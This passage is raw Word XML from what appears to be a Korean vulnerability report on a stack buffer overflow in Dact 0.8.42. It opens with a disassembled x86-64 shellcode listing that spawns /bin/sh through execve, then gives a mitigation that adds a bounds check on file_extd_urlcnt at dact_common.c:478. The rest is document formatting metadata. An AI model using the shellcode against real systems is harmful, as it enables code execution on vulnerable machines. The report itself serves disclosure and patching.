        <w:t>movabs $0x732f2f2f6e69622f,%rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51351895" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1132:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">2f 2f 73 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFCE417" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1135:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">50                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC75001" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1136:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">48 89 e7             </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>mov    %rsp,%rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554DD66" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1139:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">68 72 69 01 01       </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   $0x1016972</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE843F" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    113e:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">81 34 24 01 01 01 01 </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xorl   $0x1010101,(%rsp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE437D5" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1145:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">31 f6                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xor    %esi,%esi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043EC325" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1147:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">56                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D110F8" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1148:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">6a 08                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   $0x8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84F294" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    114a:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">5e                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>pop    %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005AF49B" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    114b:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">48 01 e6             </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>add    %rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6693CF" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    114e:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">56                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   %rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46413A33" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    114f:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">48 89 e6             </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>mov    %rsp,%rsi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62A220" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1152:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">31 d2                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>xor    %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F2792C" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1154:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">6a 3b                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>push   $0x3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121F54C5" w14:textId="77777777" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    1156:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">58                   </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>pop    %rax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75293046" w14:textId="5703BD7E" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:r>
        <w:t xml:space="preserve">    1157:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">0f 05                </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>syscall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02161DE5" w14:textId="3BEEC495" w:rsidR="00897A0B" w:rsidRDefault="00897A0B" w:rsidP="00897A0B">
      <w:r>
        <w:t xml:space="preserve">execve </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">시스템 콜을 이용해 </w:t>
      </w:r>
      <w:r>
        <w:t>/bin/sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 실행하는 쉘코드이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4045CD94" w14:textId="07215D2E" w:rsidR="00D25391" w:rsidRPr="00D25391" w:rsidRDefault="00D25391" w:rsidP="00D25391">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>itigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79328DDF" w14:textId="205931CC" w:rsidR="00D25391" w:rsidRDefault="00D25391" w:rsidP="00D25391">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 취약점이 존재하는 버전인 </w:t>
      </w:r>
      <w:r>
        <w:t>0.8.42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 D</w:t>
      </w:r>
      <w:r>
        <w:t>act</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">의 최신 </w:t>
      </w:r>
      <w:r>
        <w:t>release</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF2D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">따라서 공식적인 </w:t>
      </w:r>
      <w:r w:rsidR="00AF2D75">
        <w:t xml:space="preserve">bug fix </w:t>
      </w:r>
      <w:r w:rsidR="00AF2D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>패치는 존재하지 않는다.</w:t>
      </w:r>
      <w:r w:rsidR="00AF2D75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00932572">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하지만 해당 취약점은 쉽게 제거할 수 있다.</w:t>
      </w:r>
      <w:r w:rsidR="00932572">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">스택에 </w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:t>BOF</w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 발생하는 이유는 f</w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:t xml:space="preserve">ile_extd_urls </w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>배열의 크기를 고려하지 않고 계속 데이터를</w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CC3D39">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스택에 저장하는 것</w:t>
      </w:r>
      <w:r w:rsidR="007419D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이다.</w:t>
      </w:r>
      <w:r w:rsidR="007419D2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">따라서 </w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:t>file_extd_urlcnt</w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 값을 검사해</w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:t xml:space="preserve"> file_extd_urls </w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>배열에 접근하도록 하면 취약점은 제거된다.</w:t>
      </w:r>
      <w:r w:rsidR="00992CF1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45444BE9" w14:textId="77777777" w:rsidR="00992CF1" w:rsidRPr="00992CF1" w:rsidRDefault="00992CF1" w:rsidP="00992CF1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992CF1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file_extd_urls</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF1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file_extd_urlcnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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++</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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]</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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parse_url_subst</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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hdr_buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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  <w:r w:rsidRPr="00992CF1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filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A923FD" w14:textId="48C5C4DB" w:rsidR="00992CF1" w:rsidRDefault="00992CF1" w:rsidP="00D25391">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>act_common.c:478</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 다음과 같이 수정한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0B1FE8" w14:textId="77777777" w:rsidR="00992CF1" w:rsidRPr="00992CF1" w:rsidRDefault="00992CF1" w:rsidP="00992CF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992CF1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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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file_extd_urlcnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF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</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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256</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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37D3D189" w14:textId="52E747E4" w:rsidR="00992CF1" w:rsidRPr="00992CF1" w:rsidRDefault="00992CF1" w:rsidP="00992CF1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992CF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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF1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file_extd_urls</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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[</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF1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file_extd_urlcnt</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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++</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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]</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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parse_url_subst</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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992CF1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hdr_buf</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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  <w:r w:rsidRPr="00992CF1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filename</w:t>
      </w:r>
      <w:r w:rsidRPr="00992CF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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2577420E" w14:textId="2E5409FA" w:rsidR="00AA26B5" w:rsidRDefault="0076493D" w:rsidP="00D25391">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위 수정으로 해당 라인에서 </w:t>
      </w:r>
      <w:r>
        <w:t>file_extd_urls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로의 접근이</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스택의 다른 부분을 침범하지 않도록 할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5A4942" w14:textId="55513AB6" w:rsidR="00FB2293" w:rsidRPr="00992CF1" w:rsidRDefault="00AE746E" w:rsidP="009F214F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00FB2293" w:rsidRPr="00992C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217EF" w14:textId="77777777" w:rsidR="00254748" w:rsidRDefault="00254748" w:rsidP="004C0B9A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="598061CE" w14:textId="77777777" w:rsidR="00254748" w:rsidRDefault="00254748" w:rsidP="004C0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ED3FE" w14:textId="77777777" w:rsidR="00254748" w:rsidRDefault="00254748" w:rsidP="004C0B9A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55328233" w14:textId="77777777" w:rsidR="00254748" w:rsidRDefault="00254748" w:rsidP="004C0B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413FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5668503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969317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AEC"/>
    <w:rsid w:val="00080312"/>
    <w:rsid w:val="000849AF"/>
    <w:rsid w:val="000F0AEC"/>
    <w:rsid w:val="001562BE"/>
    <w:rsid w:val="00254748"/>
    <w:rsid w:val="003C47A9"/>
    <w:rsid w:val="004C0B9A"/>
    <w:rsid w:val="005B0DE2"/>
    <w:rsid w:val="007419D2"/>
    <w:rsid w:val="0076493D"/>
    <w:rsid w:val="007B6D21"/>
    <w:rsid w:val="007C5A65"/>
    <w:rsid w:val="00846D72"/>
    <w:rsid w:val="008675EA"/>
    <w:rsid w:val="00897A0B"/>
    <w:rsid w:val="008F7005"/>
    <w:rsid w:val="00913920"/>
    <w:rsid w:val="00932572"/>
    <w:rsid w:val="009647B7"/>
    <w:rsid w:val="00992CF1"/>
    <w:rsid w:val="009F214F"/>
    <w:rsid w:val="00AA26B5"/>
    <w:rsid w:val="00AE746E"/>
    <w:rsid w:val="00AF2D75"/>
    <w:rsid w:val="00AF4A3A"/>
    <w:rsid w:val="00B14D7B"/>
    <w:rsid w:val="00C86D32"/>
    <w:rsid w:val="00CC3D39"/>
    <w:rsid w:val="00D25391"/>
    <w:rsid w:val="00DF390F"/>
    <w:rsid w:val="00F0135E"/>
    <w:rsid w:val="00FB2293"/>
    <w:rsid w:val="00FF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829882"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A40F7F85-3096-4BB7-B2F1-42CA8649A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AE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C0B9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C0B9A"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C0B9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C0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5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5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9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김현승</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>김현승</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-19T04:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-22T07:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>